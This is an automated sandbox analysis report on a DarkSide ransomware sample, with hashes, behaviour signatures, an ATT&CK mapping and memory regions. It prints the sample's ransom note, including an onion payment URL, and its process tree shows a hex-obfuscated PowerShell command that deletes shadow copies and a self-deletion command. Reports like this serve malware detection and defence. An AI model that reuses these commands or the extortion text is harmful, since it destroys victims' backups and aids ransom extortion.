Analysis

  • max time kernel
    72s
  • max time network
    96s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    16-05-2021 21:21

General

  • Target

    4098b54c9d27b00ce34d04ffac24213ed28993a2854827851b157d63407c2e4e.exe

  • Size

    5.9MB

  • MD5

    794c5aa1b0e1f9cf2fc7fe5f22117c3f

  • SHA1

    1821fe210298b1d22b25f1a544abcfe092999ff7

  • SHA256

    4098b54c9d27b00ce34d04ffac24213ed28993a2854827851b157d63407c2e4e

  • SHA512

    28c186359035e3f4bc5b4f0420c1e72de5e16fc3fa3b8d41316dd59739c552c810e180feff4637f25696f59b291b7cc00d66d969a4e7d2f460ec4471b1ad83cf

Malware Config

Extracted

Path

C:\\README.f2cbf9aa.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT When you open our website, put the following data in the input form: Key: 0kZdK3HQhsAkUtvRl41QkOdpJvzcWnCrBjjgg5U4zfuWeTnZR5Ssjd3QLHpmbjxjo7uWzKbt8qPVuYN38TsDPI3bemd5I40ksemIzuI5OhIHZsi9cn3Wpd7OUT72FP9MyAUzR586yMsI2Ygri9in0Bf4EkG0pmBOLyRG1T788foGJQW1WxS1Qd2sMVvX0jKlbGG1zLp7g0u6buDCzSMyTjWjuVzJYufBBv7S2XvciEVvboiTNbZA4UUU6PttKERQSb018aILd6xO3ulk6fbEgZDO5tZSGn2zRevn5YXnHtg6vt1ToLe3izQOgYbs8Ja1fkfJBUYVux1ITyWBjpn0xPayKfwln8SqgMkbqiDyxEDEtFhqiffLcONMhi4TmW50loZIC6mWSaOjThWp6XSJUWPtY8Mkzs8Cs0qjPahx58iAEVIRGUVpLkMs7xPN7ydZ6wMWaOcRC1AD1JEUVTjLikXXyckgYaS6FnEv0UNEsv6QbTLSpDomIg3rEYZBib6ozrwH5n0M5wrKo8NciUBmfJWDP4XKkjznpsa05rEpuAklM0dMmZsYGVR !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4098b54c9d27b00ce34d04ffac24213ed28993a2854827851b157d63407c2e4e.exe
    "C:\Users\Admin\AppData\Local\Temp\4098b54c9d27b00ce34d04ffac24213ed28993a2854827851b157d63407c2e4e.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1556
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\4098B5~1.EXE >> NUL
      2⤵
      • Deletes itself
      PID:2768
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1784

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Discovery

System Information Discovery

1
T1082

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    901746ed9dfab5c1d84b9fb413e72899

    SHA1

    9020bd2fdbce79aa9e3e5b8b8e26ae1e15437ec2

    SHA256

    6831bce606318535d4c1388d54b83687b0ebe3831d9ae98bf8ecb69983217b4f

    SHA512

    56b1b05183ae8ce8ef65749d42e161fab3e6da2e7bcab30acec064bb15d0b2b2ed7aab290c092e22c5f0a59b5ea78fc61bd7b3ad8496e16e697075dac8dd9532

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    6b0bab1d31c04afc3fa06e8389c8c62f

    SHA1

    88fef5af4957240df09f53ae771d4422d4acb759

    SHA256

    68ff3f8c831f854654d43612ec785a8257c80785f5ee6b15c5fa5278272d761c

    SHA512

    50d59c657970a9630c99b723bcbbbfceff125a41fa4174929583a0ff409d518ac8c0ebfb9c61deea63f9e8437c8a07ea48e376f6caab6e587a24caa85741610e

  • memory/1060-63-0x0000000000130000-0x0000000000131000-memory.dmp
    Filesize

    4KB

  • memory/1060-66-0x0000000000160000-0x0000000000161000-memory.dmp
    Filesize

    4KB

  • memory/1060-61-0x0000000000110000-0x0000000000111000-memory.dmp
    Filesize

    4KB

  • memory/1060-68-0x0000000000190000-0x0000000000191000-memory.dmp
    Filesize

    4KB

  • memory/1060-74-0x00000000001F0000-0x00000000001F1000-memory.dmp
    Filesize

    4KB

  • memory/1060-73-0x00000000001E0000-0x00000000001E1000-memory.dmp
    Filesize

    4KB

  • memory/1060-76-0x00000000750C1000-0x00000000750C3000-memory.dmp
    Filesize

    8KB

  • memory/1060-75-0x0000000000240000-0x0000000000BE8000-memory.dmp
    Filesize

    9.7MB

  • memory/1060-72-0x00000000001D0000-0x00000000001D1000-memory.dmp
    Filesize

    4KB

  • memory/1060-70-0x00000000001B0000-0x00000000001B1000-memory.dmp
    Filesize

    4KB

  • memory/1060-65-0x0000000000150000-0x0000000000151000-memory.dmp
    Filesize

    4KB

  • memory/1060-64-0x0000000000140000-0x0000000000141000-memory.dmp
    Filesize

    4KB

  • memory/1060-69-0x00000000001A0000-0x00000000001A1000-memory.dmp
    Filesize

    4KB

  • memory/1060-62-0x0000000000120000-0x0000000000121000-memory.dmp
    Filesize

    4KB

  • memory/1060-67-0x0000000000180000-0x0000000000181000-memory.dmp
    Filesize

    4KB

  • memory/1060-59-0x00000000000F0000-0x00000000000F1000-memory.dmp
    Filesize

    4KB

  • memory/1060-71-0x00000000001C0000-0x00000000001C1000-memory.dmp
    Filesize

    4KB

  • memory/1060-60-0x0000000000100000-0x0000000000101000-memory.dmp
    Filesize

    4KB

  • memory/1556-80-0x0000000001DC0000-0x0000000001DC1000-memory.dmp
    Filesize

    4KB

  • memory/1556-81-0x000000001AD30000-0x000000001AD31000-memory.dmp
    Filesize

    4KB

  • memory/1556-82-0x0000000002440000-0x0000000002441000-memory.dmp
    Filesize

    4KB

  • memory/1556-79-0x000007FEFB701000-0x000007FEFB703000-memory.dmp
    Filesize

    8KB

  • memory/1556-84-0x000000001B920000-0x000000001B921000-memory.dmp
    Filesize

    4KB

  • memory/1556-85-0x00000000026C0000-0x00000000026C1000-memory.dmp
    Filesize

    4KB

  • memory/1556-78-0x0000000000000000-mapping.dmp
  • memory/1556-83-0x0000000002320000-0x0000000002321000-memory.dmp
    Filesize

    4KB

  • memory/2768-88-0x0000000000000000-mapping.dmp